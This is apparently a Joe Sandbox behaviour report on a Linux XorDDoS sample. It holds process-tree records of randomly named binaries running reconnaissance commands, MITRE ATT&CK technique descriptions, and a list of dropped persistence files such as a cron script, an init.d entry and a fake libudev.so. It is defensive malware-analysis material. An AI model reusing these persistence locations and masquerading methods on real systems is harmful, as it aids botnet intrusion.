Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: vigcpbezza PID: 6520, Parent PID: 1860

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	/usr/bin/vigcpbezza "cd /etc" 6209
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: vigcpbezza PID: 6524, Parent PID: 6520

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	-
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6522, Parent PID: 6209

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6523, Parent PID: 6522

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: vigcpbezza PID: 6523, Parent PID: 1860

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	/usr/bin/vigcpbezza "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: vigcpbezza PID: 6527, Parent PID: 6523

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	-
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6525, Parent PID: 6209

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6526, Parent PID: 6525

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: vigcpbezza PID: 6526, Parent PID: 1860

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	/usr/bin/vigcpbezza "echo \"find\"" 6209
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: vigcpbezza PID: 6528, Parent PID: 6526

General

Start time (UTC):	15:53:37
Start date (UTC):	29/10/2023
Path:	/usr/bin/vigcpbezza
Arguments:	-
File size:	625900 bytes
MD5 hash:	9bbb510e2c2ffad6381fa18d91e42ba7

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6531, Parent PID: 6209

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6532, Parent PID: 6531

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: nffvpfovhi PID: 6532, Parent PID: 6531

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	/usr/bin/nffvpfovhi "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: nffvpfovhi PID: 6535, Parent PID: 6532

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	-
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6533, Parent PID: 6209

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6534, Parent PID: 6533

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: nffvpfovhi PID: 6534, Parent PID: 1860

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	/usr/bin/nffvpfovhi "grep \"A\"" 6209
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: nffvpfovhi PID: 6539, Parent PID: 6534

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	-
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6536, Parent PID: 6209

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6537, Parent PID: 6536

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: nffvpfovhi PID: 6537, Parent PID: 1860

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	/usr/bin/nffvpfovhi id 6209
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: nffvpfovhi PID: 6542, Parent PID: 6537

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	-
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6538, Parent PID: 6209

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6540, Parent PID: 6538

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: nffvpfovhi PID: 6540, Parent PID: 1860

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	/usr/bin/nffvpfovhi "ls -la" 6209
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: nffvpfovhi PID: 6544, Parent PID: 6540

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	-
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6541, Parent PID: 6209

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6543, Parent PID: 6541

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: nffvpfovhi PID: 6543, Parent PID: 1860

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	/usr/bin/nffvpfovhi uptime 6209
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: nffvpfovhi PID: 6545, Parent PID: 6543

General

Start time (UTC):	15:53:42
Start date (UTC):	29/10/2023
Path:	/usr/bin/nffvpfovhi
Arguments:	-
File size:	625900 bytes
MD5 hash:	376e3879c431923310565c72297302cc

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6548, Parent PID: 6209

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6549, Parent PID: 6548

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6549, Parent PID: 6548

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	/usr/bin/zvrtnapfcs gnome-terminal 6209
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6552, Parent PID: 6549

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	-
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6550, Parent PID: 6209

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6551, Parent PID: 6550

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6551, Parent PID: 1860

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	/usr/bin/zvrtnapfcs ls 6209
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6557, Parent PID: 6551

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	-
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6553, Parent PID: 6209

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6554, Parent PID: 6553

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6554, Parent PID: 1860

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	/usr/bin/zvrtnapfcs "grep \"A\"" 6209
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6559, Parent PID: 6554

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	-
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6555, Parent PID: 6209

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6556, Parent PID: 6555

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6556, Parent PID: 1860

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	/usr/bin/zvrtnapfcs ls 6209
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6561, Parent PID: 6556

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	-
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6558, Parent PID: 6209

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6560, Parent PID: 6558

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6560, Parent PID: 1860

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	/usr/bin/zvrtnapfcs "cat resolv.conf" 6209
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: zvrtnapfcs PID: 6562, Parent PID: 6560

General

Start time (UTC):	15:53:47
Start date (UTC):	29/10/2023
Path:	/usr/bin/zvrtnapfcs
Arguments:	-
File size:	625900 bytes
MD5 hash:	42da71a26ad9caa22fb437fcddc63a02

Chronological Activities

Analysis Process: systemd PID: 6221, Parent PID: 6220

General

Start time (UTC):	15:51:47
Start date (UTC):	29/10/2023
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6221, Parent PID: 6220

General

Start time (UTC):	15:51:47
Start date (UTC):	29/10/2023
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report dptxrnhxmx.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/dptxrnhxmx.elf

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/doxgrgkpoa

/usr/bin/drdxrfohux

/usr/bin/gcfolkfaec

/usr/bin/mbeioyodii

/usr/bin/mntlutgnfs

/usr/bin/qabtuykfdb

/usr/bin/rhlqbltizb

/usr/bin/scllcnzpeu

/usr/bin/tgdthymawi

/usr/bin/tqdlzqtrvv

/usr/bin/wobaryykiz

/usr/bin/wrvptdarnp

/usr/bin/zfzhrlhjxr

/usr/lib/libudev.so

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Linux Analysis Report
dptxrnhxmx.elf